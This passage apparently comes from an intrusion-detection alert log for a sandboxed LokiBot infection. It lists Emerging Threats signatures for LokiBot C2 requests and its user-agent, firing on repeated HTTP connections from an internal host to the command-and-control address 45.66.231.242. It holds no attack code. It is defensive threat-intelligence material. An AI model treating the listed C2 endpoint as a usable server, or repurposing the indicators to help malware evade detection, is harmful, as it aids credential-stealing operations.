2024-10-01T10:56:40.380881+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:41.310664+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:42.196431+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:43.188728+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:44.087856+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.963211+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:45.843694+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:46.767886+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:47.568144+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:48.474448+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:49.332110+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:50.153802+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.984561+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:51.881052+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:52.776756+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:53.773058+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:54.594825+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:55.410095+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:56.206844+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:57.141032+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.970989+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:58.804022+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:57:00.074828+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:01.013791+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.960683+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49844	45.66.231.242	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:55:01.753408+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:02.666163+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:03.554360+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:04.620841+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:05.540676+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:06.533521+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:10.377698+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:11.258339+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:12.104380+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.998782+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.904671+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:14.896174+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:15.839773+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:16.898883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:20.761788+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:21.655036+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:22.549440+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:23.470660+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:24.552098+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:25.375102+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:26.195469+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:27.085668+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.951507+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:28.839624+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:29.661872+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:30.557844+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:31.394167+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:32.194135+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:33.025064+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.949352+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:34.773757+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:35.685085+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:36.536343+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:37.350895+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:38.216992+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:39.220320+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:40.152556+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:41.022138+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:42.240978+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:43.424782+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:47.272279+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:48.112864+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.953210+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:50.176120+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.990247+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:51.898024+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:53.034432+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.833889+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:54.639139+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:55.642415+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:56.438948+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:57.289043+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:58.586844+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:59.517374+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:56:00.358622+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:10.260937+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:11.179166+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:12.004600+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.873678+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.732989+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:14.662421+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:15.549540+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:16.583958+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:17.494274+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:21.570507+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:22.785811+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:23.757565+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:27.643202+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:28.562142+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:29.397053+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:30.238349+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:31.057616+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:32.074355+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.917597+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:33.794817+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:34.954399+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:35.847108+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:36.897917+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:37.827181+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:38.657817+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:39.503641+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:40.380881+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:41.310664+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:42.196431+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:43.188728+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:44.087856+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.963211+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:45.843694+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:46.767886+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:47.568144+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:48.474448+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:49.332110+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:50.153802+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.984561+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:51.881052+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:52.776756+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:53.773058+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:54.594825+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:55.410095+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:56.206844+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:57.141032+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.970989+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:58.804022+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:57:00.074828+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:01.013791+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.960683+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49844	45.66.231.242	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:54:59.017244+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.929584+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.838931+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.734897+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.791909+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.714856+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.689995+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.539446+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.431407+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.290926+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.156783+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:14.059014+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:15.181877+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:16.001641+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:17.057243+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.935914+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.808725+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.700322+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.622010+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:24.716379+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.534367+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.361457+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.260785+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:28.111446+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.997001+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.807741+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.730772+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.541452+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.344919+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.286078+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:34.118881+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.933166+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.839128+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.706651+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.524416+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.374178+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.385441+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.328121+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.381303+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.421721+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.589678+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.464644+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.292929+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:49.348506+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.343657+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:51.144817+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:52.156456+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.192942+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.988611+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.958720+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.793611+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.591640+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.452108+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:58.764642+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.680645+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.513321+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.439429+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.353855+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.182284+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.911144+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.813722+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.707475+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.758460+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.789425+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.729047+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.932407+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.914707+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.790640+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.717307+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.548372+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.403711+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.360698+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.244487+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:33.078751+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:34.264055+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:35.118822+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:36.007121+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:37.076989+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.993838+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.817577+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.675484+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.543640+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.469900+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.355681+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.346923+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.250217+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:45.124436+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:46.001925+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.932311+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.715173+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.656357+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.497277+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.315483+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:51.139744+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:52.030835+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.933070+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.939406+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.751235+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.562073+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.353977+0200	2021641	1	A Network Trojan was detected	192.168.2.4	49839	45.66.231.242	80	TCP
